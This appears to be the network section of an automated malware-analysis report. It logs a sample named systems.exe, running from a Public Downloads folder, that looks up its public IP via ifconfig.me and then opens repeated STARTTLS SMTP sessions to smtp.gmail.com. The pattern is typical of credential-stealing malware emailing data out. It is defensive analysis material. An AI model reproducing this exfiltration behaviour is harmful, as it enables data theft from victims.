                                                      Feb 3, 2022 09:00:52.084609985 CET58749807108.177.127.108192.168.2.3
                                                      Feb 3, 2022 09:00:52.085238934 CET49807587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 09:00:52.112376928 CET58749807108.177.127.108192.168.2.3
                                                      Feb 3, 2022 09:00:52.112979889 CET49807587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 09:00:52.144699097 CET58749807108.177.127.108192.168.2.3
                                                      Feb 3, 2022 09:00:52.349684954 CET58749807108.177.127.108192.168.2.3
                                                      Feb 3, 2022 09:00:52.351106882 CET49807587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 09:00:52.377651930 CET58749807108.177.127.108192.168.2.3
                                                      Feb 3, 2022 09:00:52.377990961 CET58749807108.177.127.108192.168.2.3
                                                      Feb 3, 2022 09:00:52.380254030 CET49807587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 09:00:52.407341957 CET58749807108.177.127.108192.168.2.3
                                                      Feb 3, 2022 09:00:52.407926083 CET49807587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 09:00:52.439218044 CET58749807108.177.127.108192.168.2.3
                                                      Feb 3, 2022 09:00:52.610511065 CET58749807108.177.127.108192.168.2.3
                                                      Feb 3, 2022 09:00:52.613322973 CET49807587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 09:00:52.640397072 CET58749807108.177.127.108192.168.2.3
                                                      Feb 3, 2022 09:00:52.640559912 CET49807587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 09:01:39.642838001 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:39.669357061 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:39.669440985 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:39.696830034 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:39.697171926 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:39.723608017 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:39.726594925 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:39.726897001 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:39.753705025 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:39.754162073 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:39.781193972 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:39.782860041 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:39.783730984 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:39.810180902 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:39.810400963 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:39.810892105 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:39.837826014 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:39.839251041 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:39.870032072 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:40.056370020 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:40.058952093 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:40.085480928 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:40.085830927 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:40.086544991 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:40.114613056 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:40.116867065 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:40.147968054 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:40.302444935 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:40.303356886 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:01:40.330032110 CET58749808108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:01:40.330188990 CET49808587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:27.794126987 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:27.821369886 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:27.824337006 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:27.852813005 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:27.857212067 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:27.883974075 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:27.887156010 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:27.887464046 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:27.914325953 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:27.915047884 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:27.942280054 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:27.944309950 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:27.945760965 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:27.972420931 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:27.972543955 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:27.973480940 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:28.000597000 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:28.002124071 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:28.033385992 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:28.226293087 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:28.227061033 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:28.253758907 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:28.253915071 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:28.254492998 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:28.281904936 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:28.282553911 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:28.313828945 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:28.464081049 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:28.465692997 CET49809587192.168.2.3108.177.127.109
                                                      Feb 3, 2022 09:02:28.492811918 CET58749809108.177.127.109192.168.2.3
                                                      Feb 3, 2022 09:02:28.492960930 CET49809587192.168.2.3108.177.127.109

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Feb 3, 2022 08:58:42.196041107 CET6402153192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:58:42.214447021 CET53640218.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:58:56.622997046 CET6078453192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:58:56.648806095 CET53607848.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:00.598472118 CET5600953192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:00.627594948 CET53560098.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:02.173834085 CET5902653192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:02.192569971 CET53590268.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:03.779062033 CET4957253192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:03.806322098 CET53495728.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:05.394321918 CET6082353192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:05.421715021 CET53608238.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:07.079601049 CET5213053192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:07.098647118 CET53521308.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:08.948467016 CET5510253192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:08.973448038 CET53551028.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:10.637079000 CET5623653192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:10.653811932 CET53562368.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:13.069696903 CET5652753192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:13.098148108 CET53565278.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:14.556936026 CET4955953192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:14.576242924 CET53495598.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:16.144937992 CET5265053192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:16.172267914 CET53526508.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:17.606050968 CET6329753192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:17.624897957 CET53632978.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:19.207835913 CET5836153192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:19.226520061 CET53583618.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:20.998017073 CET5361553192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:21.016367912 CET53536158.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:22.465648890 CET5710653192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:22.482212067 CET53571068.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:24.004132986 CET6035253192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:24.022861958 CET53603528.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:25.528690100 CET5677353192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:25.545681953 CET53567738.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:27.103940010 CET6098253192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:27.120595932 CET53609828.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:28.763092041 CET5805853192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:28.781198978 CET53580588.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:31.397520065 CET6436753192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:31.415810108 CET53643678.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:32.960474014 CET5153953192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:32.979222059 CET53515398.8.8.8192.168.2.3
                                                      Feb 3, 2022 08:59:59.019984007 CET6511053192.168.2.38.8.8.8
                                                      Feb 3, 2022 08:59:59.038574934 CET53651108.8.8.8192.168.2.3
                                                      Feb 3, 2022 09:00:51.889064074 CET5307953192.168.2.38.8.8.8
                                                      Feb 3, 2022 09:00:51.907577991 CET53530798.8.8.8192.168.2.3
                                                      Feb 3, 2022 09:01:39.622185946 CET5082453192.168.2.38.8.8.8
                                                      Feb 3, 2022 09:01:39.641066074 CET53508248.8.8.8192.168.2.3
                                                      Feb 3, 2022 09:02:27.741584063 CET5670653192.168.2.38.8.8.8
                                                      Feb 3, 2022 09:02:27.769123077 CET53567068.8.8.8192.168.2.3

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Feb 3, 2022 08:58:42.196041107 CET192.168.2.38.8.8.80x552cStandard query (0)ifconfig.meA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:58:56.622997046 CET192.168.2.38.8.8.80xef84Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:00.598472118 CET192.168.2.38.8.8.80xf8baStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:02.173834085 CET192.168.2.38.8.8.80x99cdStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:03.779062033 CET192.168.2.38.8.8.80xb033Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:05.394321918 CET192.168.2.38.8.8.80x6f92Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:07.079601049 CET192.168.2.38.8.8.80xb999Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:08.948467016 CET192.168.2.38.8.8.80x1084Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:10.637079000 CET192.168.2.38.8.8.80xf328Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:13.069696903 CET192.168.2.38.8.8.80x80a8Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:14.556936026 CET192.168.2.38.8.8.80x62deStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:16.144937992 CET192.168.2.38.8.8.80x4857Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:17.606050968 CET192.168.2.38.8.8.80x2d7fStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:19.207835913 CET192.168.2.38.8.8.80xa838Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:20.998017073 CET192.168.2.38.8.8.80x38f4Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:22.465648890 CET192.168.2.38.8.8.80x3e3eStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:24.004132986 CET192.168.2.38.8.8.80xda5fStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:25.528690100 CET192.168.2.38.8.8.80xacfeStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:27.103940010 CET192.168.2.38.8.8.80xde6fStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:28.763092041 CET192.168.2.38.8.8.80xa83dStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:31.397520065 CET192.168.2.38.8.8.80x2587Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:32.960474014 CET192.168.2.38.8.8.80x8f73Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:59.019984007 CET192.168.2.38.8.8.80x68a8Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 09:00:51.889064074 CET192.168.2.38.8.8.80x831bStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 09:01:39.622185946 CET192.168.2.38.8.8.80x2bc8Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                      Feb 3, 2022 09:02:27.741584063 CET192.168.2.38.8.8.80x8824Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Feb 3, 2022 08:58:42.214447021 CET8.8.8.8192.168.2.30x552cNo error (0)ifconfig.me34.117.59.81A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:58:56.648806095 CET8.8.8.8192.168.2.30xef84No error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:00.627594948 CET8.8.8.8192.168.2.30xf8baNo error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:02.192569971 CET8.8.8.8192.168.2.30x99cdNo error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:03.806322098 CET8.8.8.8192.168.2.30xb033No error (0)smtp.gmail.com108.177.127.109A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:05.421715021 CET8.8.8.8192.168.2.30x6f92No error (0)smtp.gmail.com108.177.127.109A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:07.098647118 CET8.8.8.8192.168.2.30xb999No error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:08.973448038 CET8.8.8.8192.168.2.30x1084No error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:10.653811932 CET8.8.8.8192.168.2.30xf328No error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:13.098148108 CET8.8.8.8192.168.2.30x80a8No error (0)smtp.gmail.com108.177.127.109A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:14.576242924 CET8.8.8.8192.168.2.30x62deNo error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:16.172267914 CET8.8.8.8192.168.2.30x4857No error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:17.624897957 CET8.8.8.8192.168.2.30x2d7fNo error (0)smtp.gmail.com108.177.127.109A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:19.226520061 CET8.8.8.8192.168.2.30xa838No error (0)smtp.gmail.com108.177.127.109A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:21.016367912 CET8.8.8.8192.168.2.30x38f4No error (0)smtp.gmail.com108.177.127.109A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:22.482212067 CET8.8.8.8192.168.2.30x3e3eNo error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:24.022861958 CET8.8.8.8192.168.2.30xda5fNo error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:25.545681953 CET8.8.8.8192.168.2.30xacfeNo error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:27.120595932 CET8.8.8.8192.168.2.30xde6fNo error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:28.781198978 CET8.8.8.8192.168.2.30xa83dNo error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:31.415810108 CET8.8.8.8192.168.2.30x2587No error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:32.979222059 CET8.8.8.8192.168.2.30x8f73No error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 08:59:59.038574934 CET8.8.8.8192.168.2.30x68a8No error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 09:00:51.907577991 CET8.8.8.8192.168.2.30x831bNo error (0)smtp.gmail.com108.177.127.108A (IP address)IN (0x0001)
                                                      Feb 3, 2022 09:01:39.641066074 CET8.8.8.8192.168.2.30x2bc8No error (0)smtp.gmail.com108.177.127.109A (IP address)IN (0x0001)
                                                      Feb 3, 2022 09:02:27.769123077 CET8.8.8.8192.168.2.30x8824No error (0)smtp.gmail.com108.177.127.109A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • ifconfig.me

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.34971734.117.59.8180C:\Users\Public\Downloads\systems.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Feb 3, 2022 08:58:42.280294895 CET94OUTGET /ip HTTP/1.1
                                                      Host: ifconfig.me
                                                      Connection: Keep-Alive
                                                      Feb 3, 2022 08:58:42.407066107 CET94INHTTP/1.1 200 OK
                                                      x-cloud-trace-context: c9b80a52a6fb3908f0bf44101a85b65b/18345232160021482580
                                                      access-control-allow-origin: *
                                                      content-type: text/plain; charset=utf-8
                                                      content-length: 14
                                                      date: Thu, 03 Feb 2022 07:58:42 GMT
                                                      x-envoy-upstream-service-time: 3
                                                      Via: 1.1 google
                                                      Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 36 31
                                                      Data Ascii: 102.129.143.61


                                                      SMTP Packets

                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                      Feb 3, 2022 08:58:56.719193935 CET58749718108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP s7sm16452202ejo.212 - gsmtp
                                                      Feb 3, 2022 08:58:56.719634056 CET49718587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:58:56.748927116 CET58749718108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:58:56.749232054 CET49718587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:58:56.776585102 CET58749718108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:00.687567949 CET58749721108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP g16sm3879179edr.101 - gsmtp
                                                      Feb 3, 2022 08:59:00.691104889 CET49721587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:00.720290899 CET58749721108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:00.720954895 CET49721587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:00.747639894 CET58749721108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:02.247893095 CET58749722108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP h26sm1846686eje.146 - gsmtp
                                                      Feb 3, 2022 08:59:02.248238087 CET49722587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:02.277266026 CET58749722108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:02.280819893 CET49722587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:02.308052063 CET58749722108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:03.861840963 CET58749723108.177.127.109192.168.2.3220 smtp.gmail.com ESMTP l3sm21616558edr.61 - gsmtp
                                                      Feb 3, 2022 08:59:03.862091064 CET49723587192.168.2.3108.177.127.109EHLO 066656
                                                      Feb 3, 2022 08:59:03.892075062 CET58749723108.177.127.109192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:03.892448902 CET49723587192.168.2.3108.177.127.109STARTTLS
                                                      Feb 3, 2022 08:59:03.919421911 CET58749723108.177.127.109192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:05.477067947 CET58749724108.177.127.109192.168.2.3220 smtp.gmail.com ESMTP w6sm8199814edd.50 - gsmtp
                                                      Feb 3, 2022 08:59:05.478709936 CET49724587192.168.2.3108.177.127.109EHLO 066656
                                                      Feb 3, 2022 08:59:05.507792950 CET58749724108.177.127.109192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:05.508091927 CET49724587192.168.2.3108.177.127.109STARTTLS
                                                      Feb 3, 2022 08:59:05.535037994 CET58749724108.177.127.109192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:07.154808044 CET58749725108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP z19sm16670692eji.87 - gsmtp
                                                      Feb 3, 2022 08:59:07.155081987 CET49725587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:07.184533119 CET58749725108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:07.185108900 CET49725587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:07.212518930 CET58749725108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:09.029530048 CET58749726108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP a27sm21813545edj.17 - gsmtp
                                                      Feb 3, 2022 08:59:09.029948950 CET49726587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:09.059854031 CET58749726108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:09.060378075 CET49726587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:09.087548018 CET58749726108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:10.718103886 CET58749727108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP q8sm14927506eja.209 - gsmtp
                                                      Feb 3, 2022 08:59:10.751132011 CET49727587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:10.780472040 CET58749727108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:10.780713081 CET49727587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:10.807688951 CET58749727108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:13.154009104 CET58749728108.177.127.109192.168.2.3220 smtp.gmail.com ESMTP u12sm21908069edq.8 - gsmtp
                                                      Feb 3, 2022 08:59:13.154289007 CET49728587192.168.2.3108.177.127.109EHLO 066656
                                                      Feb 3, 2022 08:59:13.183774948 CET58749728108.177.127.109192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:13.184041023 CET49728587192.168.2.3108.177.127.109STARTTLS
                                                      Feb 3, 2022 08:59:13.210720062 CET58749728108.177.127.109192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:14.631911039 CET58749729108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP a23sm21799064eda.94 - gsmtp
                                                      Feb 3, 2022 08:59:14.632215023 CET49729587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:14.661142111 CET58749729108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:14.661582947 CET49729587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:14.689076900 CET58749729108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:16.228499889 CET58749730108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP w25sm21944581edv.68 - gsmtp
                                                      Feb 3, 2022 08:59:16.228771925 CET49730587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:16.257740021 CET58749730108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:16.257997036 CET49730587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:16.285010099 CET58749730108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:17.681102991 CET58749731108.177.127.109192.168.2.3220 smtp.gmail.com ESMTP u17sm16392399ejb.31 - gsmtp
